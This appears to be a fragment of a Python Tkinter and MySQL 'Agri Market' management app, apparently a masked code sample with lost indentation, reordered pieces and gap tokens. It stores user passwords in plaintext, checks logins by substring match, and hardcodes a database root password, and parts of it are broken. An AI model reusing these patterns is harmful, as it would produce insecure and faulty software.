label.place(x=300, y=400)
except:
l = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))
l.place(x=100, y=300)
update_company()
<|reserved_special_token_0|>
def search_company():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Company Id:', font=('Times new roman', 20),
bg='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=
search_c)
Button.place(x=400, y=400)
def search_c():
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
try:
sql = 'SELECT * FROM company WHERE c_id=%s;'
val = [e1.get()]
cur.execute(sql, val)
Button = tk.Button(root, text='OK', font=('Arial', 15), command=company
)
Button.place(x=300, y=400)
for val in cur:
count = 0
Y = 50
names = ['company id: ', 'company name: ', 'company address: ']
for i in val:
label = Label(root, text=names[count] + str(i), font=(
'Times new roman', 20), bg='tomato')
label.place(x=10, y=Y)
Y += 50
count += 1
db.commit()
except:
l = Label(root, text='Invalid Company Id', font=('times new roman', 15)
)
l.place(x=100, y=300)
search_company()
def fertilizer():
global root
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Fertilizer Table', font=('Times new roman',
15), bg='white')
label.place(x=350, y=10)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=
entity_page)
Button.place(x=10, y=50)
Button = tk.Button(root, text='Insert', font=('Arial', 15), command=
insert_fer)
Button.place(x=110, y=50)
Button = tk.Button(root, text='Delete', font=('Arial', 15), command=
delete_fer)
Button.place(x=210, y=50)
Button = tk.Button(root, text='Update', font=('Arial', 15), command=
update_fer)
Button.place(x=310, y=50)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=
search_fer)
Button.place(x=410, y=50)
view_fer()
def view_fer():
frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
frame.place(x=10, y=100, width=750, height=400)
x_scroll = Scrollbar(frame, orient=HORIZONTAL)
y_scroll = Scrollbar(frame, orient=VERTICAL)
table = ttk.Treeview(frame, columns=('fe_formula', 'fe_name',
'fe_content', 'fe_price', 'company_id'), xscrollcommand=x_scroll.
set, yscrollcommand=y_scroll.set)
x_scroll.pack(side=BOTTOM, fill=X)
y_scroll.pack(side=RIGHT, fill=Y)
x_scroll.config(command=table.xview)
y_scroll.config(command=table.yview)
table.heading('fe_formula', text='Fertilizer Formula')
table.heading('fe_name', text='Fertilizer name')
table.heading('fe_content', text='Fertilizer content')
table.heading('fe_price', text='Fertilizer price')
table.heading('company_id', text='Company_id')
table['show'] = 'headings'
table.pack()
cur.execute('SELECT * FROM fertilizer;')
data = cur.fetchall()
db.commit()
if len(data) != 0:
for row in data:
table.insert('', END, values=row)
<|reserved_special_token_0|>
def insert_fer_command():
try:
sql = 'INSERT INTO fertilizer values(%s,%s,%s,%s,%s);'
vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()
cur.executemany(sql, [vals])
db.commit()
fertilizer()
except:
insert_fer()
def delete_fer():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Fertilizer formula:', font=('Times new roman',
20), bg='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=
fertilizer)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
delete_fer_command)
Button.place(x=400, y=400)
def delete_fer_command():
try:
sql = 'DELETE FROM fertilizer WHERE fe_formula=%s;'
cur.execute(sql, [e1.get()])
db.commit()
fertilizer()
except:
l = Label(root, text='Invalid Entry', font=('times new roman', 15))
l.place(x=100, y=300)
def update_fer():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Fertlizer formula:', font=('Times new roman',
20), bg='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='OK', font=('Arial', 15), command=update_fe)
Button.place(x=300, y=400)
def update_fe():
try:
global e1, e2, e3, e4, e5, e6
label = Label(root, text=' ' * 800, font=('Times new roman', 500),
bg='tomato')
label.place(x=0, y=0)
sql = 'SELECT * FROM fertilizer WHERE fe_formula=%s;'
vals = [e1.get()]
cur.execute(sql, vals)
label = Label(root, text='Fertlizer formula', font=(
'Times new roman', 20), bg='white')
label.place(x=50, y=10)
label = Label(root, text='Fertlizer name', font=('Times new roman',
20), bg='white')
label.place(x=50, y=60)
label = Label(root, text='Fertlizer content', font=(
'Times new roman', 20), bg='white')
label.place(x=50, y=110)
label = Label(root, text='Fertlizer price', font=('Times new roman',
20), bg='white')
label.place(x=50, y=160)
label = Label(root, text='comapny_id', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=210)
e1 = Entry(root)
e2 = Entry(root)
e3 = Entry(root)
e4 = Entry(root)
e5 = Entry(root)
data = cur.fetchall()
arr = [e1, e2, e3, e4, e5, e6]
count = 0
for val in data[0]:
arr[count].insert(0, val)
count += 1
e1.place(x=350, y=10)
e2.place(x=350, y=60)
e3.place(x=350, y=110)
e4.place(x=350, y=160)
e5.place(x=350, y=210)
label = Button(root, text='Modify', font=('Times new roman', 20),
bg='blue', command=update_command_fe)
label.place(x=300, y=400)
except:
l = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))
l.place(x=100, y=300)
update_fer()
<|reserved_special_token_0|>
def search_fer():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Fertlizer formula:', font=('Times new roman',
20), bg='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=
fertilizer)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=
search_fe)
Button.place(x=400, y=400)
def search_fe():
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
try:
sql = 'SELECT * FROM fertilizer WHERE fe_formula=%s;'
val = [e1.get()]
cur.execute(sql, val)
Button = tk.Button(root, text='OK', font=('Arial', 15), command=
fertilizer)
Button.place(x=300, y=400)
for val in cur:
count = 0
Y = 50
names = ['fertilizer formula: ', 'fertilizer name: ',
'fertilizer content: ', 'fertilizer price: ', 'company_id: ']
for i in val:
label = Label(root, text=names[count] + str(i), font=(
'Times new roman', 20), bg='tomato')
label.place(x=10, y=Y)
Y += 50
count += 1
db.commit()
except:
l = Label(root, text='Invalid Fertilizer formula', font=(
'times new roman', 15))
l.place(x=100, y=300)
search_fer()
def orders():
global root
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Orders Table', font=('Times new roman', 15),
bg='white')
label.place(x=350, y=10)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=
entity_page)
Button.place(x=10, y=50)
Button = tk.Button(root, text='Insert', font=('Arial', 15), command=
insert_ord)
Button.place(x=110, y=50)
Button = tk.Button(root, text='Delete', font=('Arial', 15), command=
delete_ord)
Button.place(x=210, y=50)
Button = tk.Button(root, text='Update', font=('Arial', 15), command=
update_ord)
Button.place(x=310, y=50)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=
search_ord)
Button.place(x=410, y=50)
view_ord()
def view_ord():
frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
frame.place(x=10, y=100, width=750, height=400)
x_scroll = Scrollbar(frame, orient=HORIZONTAL)
y_scroll = Scrollbar(frame, orient=VERTICAL)
table = ttk.Treeview(frame, columns=('or_id', 'or_date', 'or_fid',
'or_formula', 'or_to'), xscrollcommand=x_scroll.set, yscrollcommand
=y_scroll.set)
x_scroll.pack(side=BOTTOM, fill=X)
y_scroll.pack(side=RIGHT, fill=Y)
x_scroll.config(command=table.xview)
y_scroll.config(command=table.yview)
table.heading('or_id', text='Order Id')
table.heading('or_date', text='Order Date')
table.heading('or_fid', text='Ordered Farmer Id')
table.heading('or_formula', text='Order (item)formula')
table.heading('or_to', text='Order to')
table['show'] = 'headings'
table.pack()
cur.execute('SELECT * FROM orders;')
data = cur.fetchall()
db.commit()
if len(data) != 0:
for row in data:
table.insert('', END, values=row)
<|reserved_special_token_0|>
def insert_ord():
global e1, e2, e3, e4, e5, e6
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Order Id', font=('Times new roman', 20), bg=
'white')
label.place(x=50, y=10)
label = Label(root, text='Order date', font=('Times new roman', 20), bg
='white')
label.place(x=50, y=60)
label = Label(root, text='Order FID', font=('Times new roman', 20), bg=
'white')
label.place(x=50, y=110)
label = Label(root, text='Order formula', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=160)
label = Label(root, text='Order to', font=('Times new roman', 20), bg=
'white')
label.place(x=50, y=210)
e1 = Entry(root, width=50)
e2 = Entry(root, width=50)
e3 = Entry(root, width=50)
e4 = Entry(root, width=50)
e5 = Entry(root, width=50)
e1.place(x=350, y=10)
e2.place(x=350, y=60)
e2.insert(0, datetime.now())
e3.place(x=350, y=110)
e4.place(x=350, y=160)
e5.place(x=350, y=210)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
insert_ord_command)
Button.place(x=400, y=400)
def insert_ord_command():
try:
sql = 'INSERT INTO orders values(%s,%s,%s,%s,%s);'
vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()
cur.executemany(sql, [vals])
db.commit()
orders()
except:
insert_ord()
def delete_ord():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Order Id:', font=('Times new roman', 20), bg=
'tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
delete_ord_command)
Button.place(x=400, y=400)
def delete_ord_command():
try:
sql = 'DELETE FROM orders WHERE or_id=%s;'
cur.execute(sql, [e1.get()])
db.commit()
orders()
except:
l = Label(root, text='Invalid Entry', font=('times new roman', 15))
l.place(x=100, y=300)
def update_ord():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Order Id:', font=('Times new roman', 20), bg=
'tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='OK', font=('Arial', 15), command=update_or)
Button.place(x=300, y=400)
def update_or():
try:
global e1, e2, e3, e4, e5, e6
label = Label(root, text=' ' * 800, font=('Times new roman', 500),
bg='tomato')
label.place(x=0, y=0)
sql = 'SELECT * FROM orders WHERE or_id=%s;'
vals = [e1.get()]
cur.execute(sql, vals)
label = Label(root, text='Order Id', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=10)
label = Label(root, text='Order Date', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=60)
label = Label(root, text='Order f_id', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=110)
label = Label(root, text='Order formula', font=('Times new roman',
20), bg='white')
label.place(x=50, y=160)
label = Label(root, text='Order to', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=210)
e1 = Entry(root)
e2 = Entry(root)
e3 = Entry(root)
e4 = Entry(root)
e5 = Entry(root)
data = cur.fetchall()
arr = [e1, e2, e3, e4, e5, e6]
count = 0
for val in data[0]:
arr[count].insert(0, val)
count += 1
e1.place(x=350, y=10)
e2.place(x=350, y=60)
e3.place(x=350, y=110)
e4.place(x=350, y=160)
e5.place(x=350, y=210)
label = Button(root, text='Modify', font=('Times new roman', 20),
bg='blue', command=update_command_ord)
label.place(x=300, y=400)
except:
l = Label(root, text='Invalid Order_id', font=('times new roman', 15))
l.place(x=100, y=300)
update_ord()
def update_command_ord():
sql = (
'UPDATE orders SET or_date=%s,or_fid=%s,or_formula=%s,or_to=%s WHERE or_id=%s;'
)
vals = e2.get(), e3.get(), e4.get(), e5.get(), e1.get()
cur.executemany(sql, [vals])
db.commit()
orders()
def search_ord():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Order Id:', font=('Times new roman', 20), bg=
'tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=
search_or)
Button.place(x=400, y=400)
def search_or():
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
try:
sql = 'SELECT * FROM orders WHERE or_id=%s;'
val = [e1.get()]
cur.execute(sql, val)
Button = tk.Button(root, text='OK', font=('Arial', 15), command=orders)
Button.place(x=300, y=400)
for val in cur:
count = 0
Y = 50
names = ['order Id: ', 'Order date: ', 'Order fid: ',
'Order formula: ', 'order to: ']
for i in val:
label = Label(root, text=names[count] + str(i), font=(
'Times new roman', 20), bg='tomato')
label.place(x=10, y=Y)
Y += 50
count += 1
db.commit()
except:
l = Label(root, text='Invalid order id', font=('times new roman', 15))
l.place(x=100, y=300)
search_ord()
def payment():
global root
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Payment Table', font=('Times new roman', 15),
bg='white')
label.place(x=350, y=10)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=
entity_page)
Button.place(x=10, y=50)
Button = tk.Button(root, text='Insert', font=('Arial', 15), command=
insert_pay)
Button.place(x=110, y=50)
Button = tk.Button(root, text='Delete', font=('Arial', 15), command=
delete_pay)
Button.place(x=210, y=50)
Button = tk.Button(root, text='Update', font=('Arial', 15), command=
update_pay)
Button.place(x=310, y=50)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=
search_pay)
Button.place(x=410, y=50)
view_pay()
def view_pay():
frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
frame.place(x=10, y=100, width=750, height=400)
x_scroll = Scrollbar(frame, orient=HORIZONTAL)
y_scroll = Scrollbar(frame, orient=VERTICAL)
table = ttk.Treeview(frame, columns=('trans_id', 'p_f_id', 'p_date',
'p_amount', 'p_method'), xscrollcommand=x_scroll.set,
yscrollcommand=y_scroll.set)
x_scroll.pack(side=BOTTOM, fill=X)
y_scroll.pack(side=RIGHT, fill=Y)
x_scroll.config(command=table.xview)
y_scroll.config(command=table.yview)
table.heading('trans_id', text='Transaction Id')
table.heading('p_f_id', text='Farmer Id')
table.heading('p_date', text='Payment Date')
table.heading('p_amount', text='Amount')
table.heading('p_method', text='Payment Method')
table['show'] = 'headings'
table.pack()
cur.execute('SELECT * FROM payment;')
data = cur.fetchall()
db.commit()
if len(data) != 0:
for row in data:
table.insert('', END, values=row)
<|reserved_special_token_0|>
def insert_pay():
global e1, e2, e3, e4, e5, e6
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Transaction Id', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=10)
label = Label(root, text='Transaction farmer id', font=(
'Times new roman', 20), bg='white')
label.place(x=50, y=60)
label = Label(root, text='Transaction date', font=('Times new roman',
20), bg='white')
label.place(x=50, y=110)
label = Label(root, text='Transaction amount', font=('Times new roman',
20), bg='white')
label.place(x=50, y=160)
label = Label(root, text='Transaction method', font=('Times new roman',
20), bg='white')
label.place(x=50, y=210)
e1 = Entry(root, width=50)
e2 = Entry(root, width=50)
e3 = Entry(root, width=50)
e4 = Entry(root, width=50)
e5 = Entry(root, width=50)
e1.place(x=350, y=10)
e2.place(x=350, y=60)
e3.place(x=350, y=110)
e3.insert(0, datetime.now())
e4.place(x=350, y=160)
e5 = StringVar(root)
e5.set('Debit card')
w = OptionMenu(root, e5, 'Credit Card', 'UPI', 'Cheque', 'Cash')
w.place(x=350, y=210)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
insert_pay_command)
Button.place(x=400, y=400)
def insert_pay_command():
try:
sql = 'INSERT INTO payment values(%s,%s,%s,%s,%s);'
vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()
cur.executemany(sql, [vals])
db.commit()
payment()
except:
insert_pay()
def delete_pay():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Transaction Id:', font=('Times new roman', 20
), bg='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
delete_pay_command)
Button.place(x=400, y=400)
def delete_pay_command():
try:
sql = 'DELETE FROM payment WHERE trans_id=%s;'
cur.execute(sql, [e1.get()])
db.commit()
payment()
except:
l = Label(root, text='Invalid Entry', font=('times new roman', 15))
l.place(x=100, y=300)
<|reserved_special_token_0|>
def search_pay():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Transaction Id:', font=('Times new roman', 20
), bg='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=
search_pa)
Button.place(x=400, y=400)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def First_page(root):
global T1, T2, T3
frame = Frame(root, height=500, width=800, bg='ivory')
frame.pack()
label = Label(root, text='WELCOME TO AGRI MARKET', font=(
'Times new roman', 25))
label.place(x=200, y=50)
button = Button(root, text='LogIn', font=('times new roman', 20),
command=check_pass, bg='green')
button.place(x=350, y=350)
L1 = tk.Label(root, text='Username', font=('Arial Bold', 15), bg='ivory')
L1.place(x=150, y=200)
T1 = tk.Entry(root, width=30, bd=5)
T1.place(x=280, y=200)
L2 = tk.Label(root, text='Password', font=('Arial Bold', 15), bg='ivory')
L2.place(x=150, y=250)
T2 = tk.Entry(root, width=30, show='*', bd=5)
T2.place(x=280, y=250)
reg_button = Button(root, text='Register', font=('Arial Bold', 15), bg=
'blue', command=create_pass)
reg_button.place(x=340, y=400)
def check_pass():
global root, T1, T2, T3
try:
with open('password.txt', 'r') as f:
lines = f.read()
if T1.get() + '=' + T2.get() in lines and T1.get(
) != '' and T2.get() != '':
entity_page()
else:
label = Label(root, text=
'Invalid username or password.Try again', font=(
'times new roman', 15))
label.place(x=200, y=100)
except:
label = Label(root, text='Invalid username or password.Try again',
font=('times new roman', 15))
label.place(x=200, y=100)
def create_pass():
global root, T1, T2, T3
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'ivory')
label.place(x=0, y=0)
L1 = tk.Label(root, text='Username', font=('Arial Bold', 15), bg='ivory')
L1.place(x=150, y=200)
T1 = tk.Entry(root, width=30, bd=5)
T1.place(x=380, y=200)
L2 = tk.Label(root, text='Password', font=('Arial Bold', 15), bg='ivory')
L2.place(x=150, y=250)
T2 = tk.Entry(root, width=30, show='*', bd=5)
T2.place(x=380, y=250)
L2 = tk.Label(root, text='Confirm Password', font=('Arial Bold', 15),
bg='ivory')
L2.place(x=150, y=300)
T3 = tk.Entry(root, width=30, show='*', bd=5)
T3.place(x=380, y=300)
reg_button = Button(root, text='Done', font=('Arial Bold', 15), bg=
'blue', command=add_pass)
reg_button.place(x=440, y=400)
def add_pass():
global root, T1, T2, T3
if T2.get() != T3.get():
label = Label(root, text='Incorrect Password. Enter again', font=(
'times new roman', 20))
label.place(x=100, y=100)
else:
try:
with open('password.txt', 'r') as f:
data = f.read()
with open('password.txt', 'w') as f:
f.write(data + '\n')
f.write(T1.get() + '=' + T2.get())
entity_page()
except:
with open('password.txt', 'w') as f:
f.write(T1.get() + '=' + T2.get())
entity_page()
def entity_page():
global root
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'ivory')
label.place(x=0, y=0)
label = Label(root, text='WELCOME TO AGRI MARKET ', font=(
'Times new roman', 20), bg='blue')
label.place(x=200, y=20)
label = Label(root, text='Choose the Entity ', font=('Times new roman',
20), bg='white')
label.place(x=250, y=100)
Button = tk.Button(root, text='Farmers', font=('Arial', 15), command=farmer
)
Button.place(x=100, y=150 + 25)
Button = tk.Button(root, text='Company', font=('Arial', 15), command=
company)
Button.place(x=300, y=150 + 25)
Button = tk.Button(root, text='Fertilizer', font=('Arial', 15), command
=fertilizer)
Button.place(x=500, y=150 + 25)
Button = tk.Button(root, text='Order', font=('Arial', 15), command=orders)
Button.place(x=200, y=300 + 25)
Button = tk.Button(root, text='Payment', font=('Arial', 15), command=
payment)
Button.place(x=400, y=300 + 25)
Button = tk.Button(root, text='GET BOOKING HISTORY', font=('Arial', 15),
command=history)
Button.place(x=200, y=400 + 25)
def history():
global root, cur, db
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
cur.execute('CALL getMonth(%s);', [datetime.today().strftime('%m')])
data = cur.fetchall()
label = Label(root, text='The Transaction History of this month', font=
('Arial', 15))
label.place(x=200, y=20)
button = Button(root, text='BACK', command=entity_page)
button.place(x=20, y=20)
frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
frame.place(x=10, y=100, width=750, height=400)
x_scroll = Scrollbar(frame, orient=HORIZONTAL)
y_scroll = Scrollbar(frame, orient=VERTICAL)
table = ttk.Treeview(frame, columns=('trans_id', 'p_f_id', 'p_date',
'p_amount', 'p_method'), xscrollcommand=x_scroll.set,
yscrollcommand=y_scroll.set)
x_scroll.pack(side=BOTTOM, fill=X)
y_scroll.pack(side=RIGHT, fill=Y)
x_scroll.config(command=table.xview)
y_scroll.config(command=table.yview)
table.heading('trans_id', text='Transaction Id')
table.heading('p_f_id', text='Farmer Id')
table.heading('p_date', text='Payment Date')
table.heading('p_amount', text='Amount')
table.heading('p_method', text='Payment Method')
table['show'] = 'headings'
table.pack()
if len(data) != 0:
for row in data:
table.insert('', END, values=row)
db.close()
db = mysql.connector.connect(host='localhost', user='root', passwd=
'bhushi', database='farmer_app')
cur = db.cursor()
def farmer():
global root
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Farmer Table', font=('Times new roman', 15),
bg='white')
label.place(x=350, y=10)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=
entity_page)
Button.place(x=10, y=50)
Button = tk.Button(root, text='Insert', font=('Arial', 15), command=
insert_farmer)
Button.place(x=110, y=50)
Button = tk.Button(root, text='Delete', font=('Arial', 15), command=
delete_farmer)
Button.place(x=210, y=50)
Button = tk.Button(root, text='Update', font=('Arial', 15), command=
update_farmer)
Button.place(x=310, y=50)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=
search_farmer)
Button.place(x=410, y=50)
view_farmer()
def view_farmer():
frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
frame.place(x=10, y=100, width=750, height=400)
x_scroll = Scrollbar(frame, orient=HORIZONTAL)
y_scroll = Scrollbar(frame, orient=VERTICAL)
table = ttk.Treeview(frame, columns=('f_id', 'f_name', 'f_phone',
'f_mail', 'f_locality', 'f_address'), xscrollcommand=x_scroll.set,
yscrollcommand=y_scroll.set)
x_scroll.pack(side=BOTTOM, fill=X)
y_scroll.pack(side=RIGHT, fill=Y)
x_scroll.config(command=table.xview)
y_scroll.config(command=table.yview)
table.heading('f_id', text='Farmer Id')
table.heading('f_name', text='Farmer Name')
table.heading('f_phone', text='Farmer Phone')
table.heading('f_mail', text='Farmer Mail')
table.heading('f_locality', text='Farmer Locality')
table.heading('f_address', text='Farmer Address')
table['show'] = 'headings'
table.column('f_id', width=100)
table.pack()
cur.execute('SELECT * FROM farmer;')
data = cur.fetchall()
db.commit()
if len(data) != 0:
for row in data:
table.insert('', END, values=row)
<|reserved_special_token_0|>
def insert_farmer():
global e1, e2, e3, e4, e5, e6
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Farmer_id', font=('Times new roman', 20), bg=
'white')
label.place(x=50, y=10)
label = Label(root, text='Farmer_name', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=60)
label = Label(root, text='Farmer_phone', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=110)
label = Label(root, text='Farmer_mail', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=160)
label = Label(root, text='Farmer_locality', font=('Times new roman', 20
), bg='white')
label.place(x=50, y=210)
label = Label(root, text='Farmer_address', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=270)
e1 = Entry(root, width=50)
e2 = Entry(root, width=50)
e3 = Entry(root, width=50)
e4 = Entry(root, width=50)
e5 = Entry(root, width=50)
e6 = Entry(root, width=50)
e1.place(x=350, y=10)
e2.place(x=350, y=60)
e3.place(x=350, y=110)
e4.place(x=350, y=160)
e5.place(x=350, y=210)
e6.place(x=350, y=270)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=farmer)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
insert_farmer_command)
Button.place(x=400, y=400)
def insert_farmer_command():
global root
try:
sql = 'INSERT INTO farmer values(%s,%s,%s,%s,%s,%s);'
if len(e1.get()) > 3:
invalid('farmer')
else:
vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get(), e6.get()
cur.executemany(sql, [vals])
db.commit()
farmer()
except:
insert_farmer()
def invalid(page):
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
if page == 'farmer':
label = Label(root, text='Enter valid farmer_id', font=(
'Times new roman', 30), bg='white')
label.place(x=170, y=200)
button = Button(root, text='Re-enter', font=('Times new roman', 20),
command=insert_farmer)
button.place(x=300, y=400)
elif page == 'company':
label = Label(root, text='Enter valid company_id', font=(
'Times new roman', 30), bg='white')
label.place(x=170, y=200)
button = Button(root, text='Re-enter', font=('Times new roman', 20),
command=insert_company)
button.place(x=300, y=400)
<|reserved_special_token_0|>
def delete_farmer_command():
try:
sql = 'DELETE FROM farmer WHERE f_id=%s;'
cur.execute(sql, [e1.get()])
db.commit()
farmer()
except:
l = Label(root, text='Invalid Entry', font=('times new roman', 15))
l.place(x=100, y=300)
def update_farmer():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Farmer Id:', font=('Times new roman', 20), bg
='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='OK', font=('Arial', 15), command=update)
Button.place(x=300, y=400)
def update():
try:
global e1, e2, e3, e4, e5, e6
label = Label(root, text=' ' * 800, font=('Times new roman', 500),
bg='tomato')
label.place(x=0, y=0)
sql = 'SELECT * FROM farmer WHERE f_id=%s;'
vals = [e1.get()]
cur.execute(sql, vals)
label = Label(root, text='Farmer_id', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=10)
label = Label(root, text='Farmer_name', font=('Times new roman', 20
), bg='white')
label.place(x=50, y=60)
label = Label(root, text='Farmer_phone', font=('Times new roman',
20), bg='white')
label.place(x=50, y=110)
label = Label(root, text='Farmer_mail', font=('Times new roman', 20
), bg='white')
label.place(x=50, y=160)
label = Label(root, text='Farmer_locality', font=('Times new roman',
20), bg='white')
label.place(x=50, y=210)
label = Label(root, text='Farmer_address', font=('Times new roman',
20), bg='white')
label.place(x=50, y=270)
e1 = Entry(root)
e2 = Entry(root)
e3 = Entry(root)
e4 = Entry(root)
e5 = Entry(root)
e6 = Entry(root)
data = cur.fetchall()
arr = [e1, e2, e3, e4, e5, e6]
count = 0
for val in data[0]:
arr[count].insert(0, val)
count += 1
e1.place(x=350, y=10)
e2.place(x=350, y=60)
e3.place(x=350, y=110)
e4.place(x=350, y=160)
e5.place(x=350, y=210)
e6.place(x=350, y=270)
label = Button(root, text='Modify', font=('Times new roman', 20),
bg='blue', command=update_command)
label.place(x=300, y=400)
except:
l = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))
l.place(x=100, y=300)
update_farmer()
def update_command():
try:
sql = (
'UPDATE farmer SET f_name=%s,f_phone_no=%s,f_mail=%s,f_locality=%s,f_address=%s WHERE f_id=%s;'
)
vals = e2.get(), e3.get(), e4.get(), e5.get(), e6.get(), e1.get()
cur.executemany(sql, [vals])
db.commit()
farmer()
except:
update_farmer()
def search_farmer():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Farmer Id:', font=('Times new roman', 20), bg
='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=farmer)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=search)
Button.place(x=400, y=400)
def search():
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
try:
sql = 'SELECT * FROM farmer WHERE f_id=%s;'
